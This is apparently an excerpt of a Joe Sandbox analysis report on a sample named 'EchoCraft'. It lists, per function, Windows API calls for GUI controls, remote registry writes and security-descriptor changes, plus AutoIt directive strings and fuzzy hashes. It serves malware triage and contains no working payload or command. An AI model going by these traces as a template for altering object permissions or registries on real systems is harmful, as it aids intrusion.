SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B118F3
DestroyWindow.USER32(?), ref: 00B11911
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00B11933
SendMessageW.USER32(?,00000421,?,?), ref: 00B11948
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00B1195B
IsWindowVisible.USER32(?), ref: 00B1197B
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00B11996
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00B119AA
GetWindowRect.USER32(?,?), ref: 00B119C2
MonitorFromPoint.USER32(?,?,00000002), ref: 00B119E8
GetMonitorInfoW.USER32(00000000,?), ref: 00B11A02
CopyRect.USER32(?,?), ref: 00B11A19
SendMessageW.USER32(?,00000412,00000000), ref: 00B11A84

Strings

tooltips_class32, xrefs: 00B118CE
(, xrefs: 00B119F5
0, xrefs: 00B117D6

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: d9225e91b0b3b4c4d0f84c755c4e35a85c933fd5a18fe9c003343308416990dd
Instruction ID: f628c8ec16fed629e95dd693d6075ecc8db9996407418e8fd070952b1caca78d
Opcode Fuzzy Hash: d9225e91b0b3b4c4d0f84c755c4e35a85c933fd5a18fe9c003343308416990dd
Instruction Fuzzy Hash: 8CB19F71614340AFD714DF68C984BAABBE5FF88350F40895CF699972A1CB70DC45CBA2

Function 00B10957 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00B109FB
_wcslen.LIBCMT ref: 00B10A35
_wcslen.LIBCMT ref: 00B10A9F
_wcslen.LIBCMT ref: 00B10B07
_wcslen.LIBCMT ref: 00B10B8B
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00B10BDB
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B10C1A

Part of subcall function 00A9FE52: _wcslen.LIBCMT ref: 00A9FE5D

Part of subcall function 00AE2A3F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AE2A58
Part of subcall function 00AE2A3F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AE2A8A

Strings

SELECTCLEAR, xrefs: 00B10C43
VIEWCHANGE, xrefs: 00B10D8B
GETSUBITEMCOUNT, xrefs: 00B10A9A, 00B10AB5
GETITEMCOUNT, xrefs: 00B10A2C, 00B10A4D
GETSELECTEDCOUNT, xrefs: 00B10B86, 00B10BA1
GETTEXT, xrefs: 00B10B02, 00B10B1D
SELECTINVERT, xrefs: 00B10C94
SELECT, xrefs: 00B10C5E
GETSELECTED, xrefs: 00B10CF7
FINDITEM, xrefs: 00B10D3D
DESELECT, xrefs: 00B10CB2
SELECTALL, xrefs: 00B10C2B
ISSELECTED, xrefs: 00B10BF3

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: cbcf8c69e8f1d763d14150520f945d7fd87f8d8f33a90100c09327beb5a66b2f
Instruction ID: a7ff6da3a491ab9fce974f767bb39bcbf9c17cda3a8154fb85948ba6e18a1a6f
Opcode Fuzzy Hash: cbcf8c69e8f1d763d14150520f945d7fd87f8d8f33a90100c09327beb5a66b2f
Instruction Fuzzy Hash: 99E1B0312283418FCB14FF24C69087AB3E6FF98314B5445ACF896972A2DB70ED85CB91

Function 00A8243E Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A82515
GetSystemMetrics.USER32(00000007), ref: 00A8251D
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A82548
GetSystemMetrics.USER32(00000008), ref: 00A82550
GetSystemMetrics.USER32(00000004), ref: 00A82575
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00A82592
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00A825A2
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00A825D5
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00A825E9
GetClientRect.USER32(00000000,000000FF), ref: 00A82607
GetStockObject.GDI32(00000011), ref: 00A82623
SendMessageW.USER32(00000000,00000030,00000000), ref: 00A8262E

Part of subcall function 00A81976: GetCursorPos.USER32(?), ref: 00A8198A
Part of subcall function 00A81976: ScreenToClient.USER32(00000000,?), ref: 00A819A7
Part of subcall function 00A81976: GetAsyncKeyState.USER32(00000001), ref: 00A819CC
Part of subcall function 00A81976: GetAsyncKeyState.USER32(00000002), ref: 00A819E6

SetTimer.USER32(00000000,00000000,00000028,00A81945), ref: 00A82655

Strings

AutoIt v3 GUI, xrefs: 00A825CD

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 162053559616933ad230bbe1098333f1ada31d66f86c89d804991c7e76b8fe1b
Instruction ID: bd6f27c9c64b5ed52a68c885afdbe03f897de721fc3027a96ecbbae9007e1403
Opcode Fuzzy Hash: 162053559616933ad230bbe1098333f1ada31d66f86c89d804991c7e76b8fe1b
Instruction Fuzzy Hash: 7BB17972A0120AAFDF14DFA8CC49FEE7BB5FB48315F118269FA15A7290DB749940CB50

Function 00AE1605 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AE1973: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AE198E
Part of subcall function 00AE1973: GetLastError.KERNEL32(?,00000000,00000000,?,?,00AE1415,?,?,?), ref: 00AE199A
Part of subcall function 00AE1973: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00AE1415,?,?,?), ref: 00AE19A9
Part of subcall function 00AE1973: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00AE1415,?,?,?), ref: 00AE19B0
Part of subcall function 00AE1973: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AE19C7

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AE166F
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AE16A3
GetLengthSid.ADVAPI32(?), ref: 00AE16BA
GetAce.ADVAPI32(?,00000000,?), ref: 00AE16F4
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AE1710
GetLengthSid.ADVAPI32(?), ref: 00AE1727
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00AE172F
HeapAlloc.KERNEL32(00000000), ref: 00AE1736
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AE1757
CopySid.ADVAPI32(00000000), ref: 00AE175E
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AE178D
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AE17AF
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AE17C1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AE17E8
HeapFree.KERNEL32(00000000), ref: 00AE17EF
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AE17F8
HeapFree.KERNEL32(00000000), ref: 00AE17FF
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AE1808
HeapFree.KERNEL32(00000000), ref: 00AE180F
GetProcessHeap.KERNEL32(00000000,?), ref: 00AE181B
HeapFree.KERNEL32(00000000), ref: 00AE1822

Part of subcall function 00AE1A0D: GetProcessHeap.KERNEL32(00000008,00AE142B,?,00000000,?,00AE142B,?), ref: 00AE1A1B
Part of subcall function 00AE1A0D: HeapAlloc.KERNEL32(00000000,?,00000000,?,00AE142B,?), ref: 00AE1A22
Part of subcall function 00AE1A0D: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00AE142B,?), ref: 00AE1A31

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: e57e80cfe8ca4ce60a4607af1f9d29f44b660bd65c6f7c763dacb4c676bc221e
Instruction ID: 242bd4509469eaebf566c978f51e331ee767a774b9086c78021e3e9267636acd
Opcode Fuzzy Hash: e57e80cfe8ca4ce60a4607af1f9d29f44b660bd65c6f7c763dacb4c676bc221e
Instruction Fuzzy Hash: 16716BB2900269BBDF10DFA6DC48FEEBBB8BF09710F148515E915A7590DB309A05CFA0

Function 00B0CB3A Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B0CC40
RegCreateKeyExW.ADVAPI32(?,?,00000000,00B1DBF4,00000000,?,00000000,?,?), ref: 00B0CCC7
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00B0CD27
_wcslen.LIBCMT ref: 00B0CD77
_wcslen.LIBCMT ref: 00B0CDF2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00B0CE35
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00B0CF44
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00B0CFD0
RegCloseKey.ADVAPI32(?), ref: 00B0D004
RegCloseKey.ADVAPI32(00000000), ref: 00B0D011
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00B0D0E3

Strings

REG_MULTI_SZ, xrefs: 00B0CE78
REG_SZ, xrefs: 00B0CDC7
REG_QWORD, xrefs: 00B0D046
REG_EXPAND_SZ, xrefs: 00B0CD50
REG_BINARY, xrefs: 00B0D096
REG_DWORD, xrefs: 00B0CF87

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 9a05fc9d3aab0857c947ac2af3eaaf6722ddf1a0d07d1e5c744506a9f6ab5359
Instruction ID: 6c3b0eb872c4b453b3e147b7adee8911e6c9692ed751122c4e493e2adbe6c2f1
Opcode Fuzzy Hash: 9a05fc9d3aab0857c947ac2af3eaaf6722ddf1a0d07d1e5c744506a9f6ab5359
Instruction Fuzzy Hash: B2125B352042019FD714EF14C991E2ABBE5FF88724F14859CF89A9B3A2DB31ED46CB91

Function 00B11034 Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00B110DC
_wcslen.LIBCMT ref: 00B11117
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B1116A
_wcslen.LIBCMT ref: 00B111A0
_wcslen.LIBCMT ref: 00B1121C
_wcslen.LIBCMT ref: 00B11297

Part of subcall function 00A9FE52: _wcslen.LIBCMT ref: 00A9FE5D

Part of subcall function 00AE33F3: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00AE3405

Strings

COLLAPSE, xrefs: 00B11217, 00B11232
GETTEXT, xrefs: 00B113AD
CHECK, xrefs: 00B1119B, 00B111B6
SELECT, xrefs: 00B11427
EXPAND, xrefs: 00B1130E
GETSELECTED, xrefs: 00B11364
UNCHECK, xrefs: 00B11454
GETITEMCOUNT, xrefs: 00B11334
EXISTS, xrefs: 00B11292, 00B112AD
ISCHECKED, xrefs: 00B113F7
GETTOTALCOUNT, xrefs: 00B11108, 00B1112D

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 5adc9818510af26c6b924a96853b52fe62d5972105b1ce19979959eea7de5514
Instruction ID: 67d571d3eb7c51b8b70afb381a150053b21a4cea180f1d61262cf031c5bec0ed
Opcode Fuzzy Hash: 5adc9818510af26c6b924a96853b52fe62d5972105b1ce19979959eea7de5514
Instruction Fuzzy Hash: 7FE1E4352043419FCB14EF28C5908AAB7E2FF84754F50499CF9969B7A2DB30EE85CB91

Function 00A87CDD Relevance: 30.0, APIs: 2, Strings: 15, Instructions: 276COMMON

Download Yara Rule

Strings

Unterminated group of comments, xrefs: 00AC60AD
#comments-start, xrefs: 00A87DC4, 00A87E16
#notrayicon, xrefs: 00A87D4C
#ce, xrefs: 00A87E52
#comments-end, xrefs: 00A87E3E
#cs, xrefs: 00A87DD8, 00A87E2A
#include, xrefs: 00A87DAC
#OnAutoItStartRegister, xrefs: 00A87D7C
#requireadmin, xrefs: 00A87D64
', xrefs: 00AC5F80
", xrefs: 00AC5F6A
#pragma compile, xrefs: 00A87D38
#include-once, xrefs: 00A87D94
Bad directive syntax error, xrefs: 00AC5FB1
Cannot parse #include, xrefs: 00AC609A

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: a7df15e0f15224f5b54187a1acec5b83b54a6f734e728926ce8edf795e70b60a
Instruction ID: 65334782347241fd2e0b7b16fe3e1e18879a4d9b310b51e9a31b4713700d16de
Opcode Fuzzy Hash: a7df15e0f15224f5b54187a1acec5b83b54a6f734e728926ce8edf795e70b60a
Instruction Fuzzy Hash: A691D171A44205BFCB11BF64DD42FEF77A8AF06300F244058F905AB192EB71EA95DBA1

Function 00B0D11B Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 240COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B0BE2E,?,?), ref: 00B0D138
_wcslen.LIBCMT ref: 00B0D174
_wcslen.LIBCMT ref: 00B0D1E2
_wcslen.LIBCMT ref: 00B0D218
_wcslen.LIBCMT ref: 00B0D273
_wcslen.LIBCMT ref: 00B0D2A9
_wcslen.LIBCMT ref: 00B0D2F9

Strings

HKCR, xrefs: 00B0D2A3, 00B0D2A8
HKEY_CURRENT_CONFIG, xrefs: 00B0D2F3, 00B0D2F8
HKU, xrefs: 00B0D36A
HKCC, xrefs: 00B0D326
HKEY_CURRENT_USER, xrefs: 00B0D337
HKLM, xrefs: 00B0D212, 00B0D217
HKEY_CLASSES_ROOT, xrefs: 00B0D26D, 00B0D272
HKEY_LOCAL_MACHINE, xrefs: 00B0D1DC, 00B0D1E1
HKCU, xrefs: 00B0D348
HKEY_USERS, xrefs: 00B0D359

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 6ac30409315a0585c1e965d015fbc37dc125a9d0aba85a766b56897f66b940c1
Instruction ID: 1e3564d79223c2362e00b9c74971184c93aa813174fdbbe04e72a9add597e2d6
Opcode Fuzzy Hash: 6ac30409315a0585c1e965d015fbc37dc125a9d0aba85a766b56897f66b940c1
Instruction Fuzzy Hash: 3271D2336001268BCB109EF8CA516BE3BD2EFA5710B2105A8FC66A72D5EF35CE459391

Function 00B18944 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B18962
_wcslen.LIBCMT ref: 00B18976
_wcslen.LIBCMT ref: 00B18999
_wcslen.LIBCMT ref: 00B189BC
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00B189FA
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00B162CE), ref: 00B18A56
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B18A8F
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00B18AD2
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B18B09
FreeLibrary.KERNEL32(?), ref: 00B18B15
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B18B25
DestroyIcon.USER32(?,?,?,?,?,00B162CE), ref: 00B18B34
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00B18B51
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00B18B5D

Strings

.dll, xrefs: 00B189B3
.icl, xrefs: 00B18970
.exe, xrefs: 00B18990

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 752a5dd63a162321b0bbf9720eb19c7ca9c65a0b6e02c3a127f3ff5c599776bc
Instruction ID: 84de2489404a7b872aa12c1beaba61c0a7efaed8170464374d9d3940ff180241
Opcode Fuzzy Hash: 752a5dd63a162321b0bbf9720eb19c7ca9c65a0b6e02c3a127f3ff5c599776bc
Instruction Fuzzy Hash: 2061ADB1910215BBEB149B64CC81BFE77A8FF08B10F508156F915DB1D1DFB5AA80DBA0

Function 00AF4790 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00AF480F
_wcslen.LIBCMT ref: 00AF481A
_wcslen.LIBCMT ref: 00AF4871
_wcslen.LIBCMT ref: 00AF48AF
GetDriveTypeW.KERNEL32(?), ref: 00AF48ED
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AF4935
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AF4970
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AF499E

Strings

set cd door , xrefs: 00AF493F
open, xrefs: 00AF486B, 00AF4870
close, xrefs: 00AF4815, 00AF482F
closed, xrefs: 00AF481F, 00AF4844, 00AF485D, 00AF4895, 00AF48AE
wait, xrefs: 00AF495B
close cd wait, xrefs: 00AF4989
type cdaudio alias cd wait, xrefs: 00AF4918
open , xrefs: 00AF48FC

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: SendString_wcslen$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1839972693-4113822522
Opcode ID: 53f115ac1bf71cc4fefd458bd92e2b3083a1e4d37104a246148f7dc10f0f8c98
Instruction ID: 069a28d3f4833c6230f00c615f242a8ab5aa1bd647473fe2593048122028410a
Opcode Fuzzy Hash: 53f115ac1bf71cc4fefd458bd92e2b3083a1e4d37104a246148f7dc10f0f8c98
Instruction Fuzzy Hash: D971F2326082169FC310EF64C99097BB7E4FF98794F104A2DF996932A1EB30DE45CB91

Function 00AE6237 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00AE624A
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00AE625C
SetWindowTextW.USER32(?,?), ref: 00AE6273
GetDlgItem.USER32(?,000003EA), ref: 00AE6288
SetWindowTextW.USER32(00000000,?), ref: 00AE628E
GetDlgItem.USER32(?,000003E9), ref: 00AE629E
SetWindowTextW.USER32(00000000,?), ref: 00AE62A4
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00AE62C5
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00AE62DF
GetWindowRect.USER32(?,?), ref: 00AE62E8
_wcslen.LIBCMT ref: 00AE634F
SetWindowTextW.USER32(?,?), ref: 00AE638B
GetDesktopWindow.USER32 ref: 00AE6391
GetWindowRect.USER32(00000000), ref: 00AE6398
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00AE63EF
GetClientRect.USER32(?,?), ref: 00AE63FC
PostMessageW.USER32(?,00000005,00000000,?), ref: 00AE6421
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00AE644B

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: dc249bfe3ad2773dfccac3be55ffb2f6e9c7b682ab9b24d2a7f6164ecfb343b8
Instruction ID: 924d163bd536dd20a45e7592bf9d53dbae443cecd72cff3807f7b8388781f0ff
Opcode Fuzzy Hash: dc249bfe3ad2773dfccac3be55ffb2f6e9c7b682ab9b24d2a7f6164ecfb343b8
Instruction Fuzzy Hash: 0471AC31900746AFDB20DFA9CE85BAEBBF5FF58744F104918E186A71A0DB74E944CB10

Function 00B00654 Relevance: 27.1, APIs: 18, Instructions: 128COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00B0066D
LoadCursorW.USER32(00000000,00007F8A), ref: 00B00678
LoadCursorW.USER32(00000000,00007F00), ref: 00B00683
LoadCursorW.USER32(00000000,00007F03), ref: 00B0068E
LoadCursorW.USER32(00000000,00007F8B), ref: 00B00699
LoadCursorW.USER32(00000000,00007F01), ref: 00B006A4
LoadCursorW.USER32(00000000,00007F81), ref: 00B006AF
LoadCursorW.USER32(00000000,00007F88), ref: 00B006BA
LoadCursorW.USER32(00000000,00007F80), ref: 00B006C5
